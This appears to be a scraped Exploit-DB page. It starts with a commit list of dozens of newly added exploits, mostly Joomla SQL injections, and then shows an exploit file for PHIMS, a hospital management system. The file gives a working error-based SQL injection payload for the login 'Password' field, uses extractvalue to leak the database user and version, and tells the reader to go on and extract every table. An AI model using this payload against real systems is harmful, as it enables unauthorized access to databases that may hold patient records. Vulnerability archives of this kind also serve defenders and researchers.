ed38447971
45 changes to exploits/shellcodes Microsoft Edge - 'UnmapViewOfFile' ACG Bypass JBoss Remoting 6.14.18 - Denial of Service Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service ABRT - raceabrt Privilege Escalation(Metasploit) Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution EPIC MyChart - SQL Injection TV - Video Subscription - Authentication Bypass SQL Injection UserSpice 4.3 - Blind SQL Injection Twig < 2.4.4 - Server Side Template Injection Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection Joomla! Component Aist 2.0 - 'id' SQL Injection Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection Joomla! Component DT Register 3.2.7 - 'id' SQL Injection Joomla! Component Fastball 2.5 - 'season' SQL Injection Joomla! Component File Download Tracker 3.0 - SQL Injection Joomla! Component Form Maker 3.6.12 - SQL Injection Joomla! Component Gallery WD 1.3.6 - SQL Injection Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection Joomla! Component jGive 2.0.9 - SQL Injection Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection Joomla! Component JS Autoz 1.0.9 - SQL Injection Joomla! Component JS Jobs 1.1.9 - SQL Injection Joomla! Component JTicketing 2.0.16 - SQL Injection Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection Joomla! Component NeoRecruit 4.1 - SQL Injection Joomla! Component Project Log 1.5.3 - 'search' SQL Injection Joomla! Component Realpin 1.5.04 - SQL Injection Joomla! Component SimpleCalendar 3.1.9 - SQL Injection Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection Joomla! Component Solidres 2.5.1 - SQL Injection Joomla! Component Staff Master 1.0 RC 1 - SQL Injection Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection Joomla! Component Saxum Astro 4.0.14 - SQL Injection Joomla! Component Saxum Numerology 3.0.4 - SQL Injection Joomla! Component SquadManagement 1.0.3 - SQL Injection Joomla! Component Saxum Picker 3.2.10 - SQL Injection Front Accounting ERP 2.4.3 - Cross-Site Request Forgery PHIMS - Hospital Management Information System - 'Password' SQL Injection PSNews Website 1.0.0 - 'Keywords' SQL Injection Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting
33 lines
No EOL
1.2 KiB
Text
33 lines
No EOL
1.2 KiB
Text
# Exploit Title: PHIMS - Hospital Management Information System - 'Password' SQL Injection
|
|
# Dork: N/A
|
|
# Date: 2018-02-16
|
|
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
|
# Vendor Homepage: https://codecanyon.net/item/phims/14974225?s_rank=1566
|
|
# Version: All version
|
|
# Category: Webapps
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands.
|
|
# # # # #
|
|
# Proof of Concept :
|
|
|
|
SQLI :
|
|
|
|
|
|
# Parameter : Password (POST)
|
|
# Type: Error based
|
|
# Title: MariaDB >= 10.2.11 AND Error based - extractvalue (XPATH query)
|
|
# Payload : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#
|
|
#######################################
|
|
# Discrption : The 'password' field is vulnerable in this script
|
|
('Password' parameter).First inject payload into this parameter.
|
|
# then put anything in username (like:anything@anything.anything) and click
|
|
login. You will have XPATH syntax
|
|
error in the next page that contains user and db_name .
|
|
# You can find all tables and any information from database by using XPATH
|
|
query .
|
|
|
|
|
|
Username : anything@anything.anything
|
|
Password : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))# |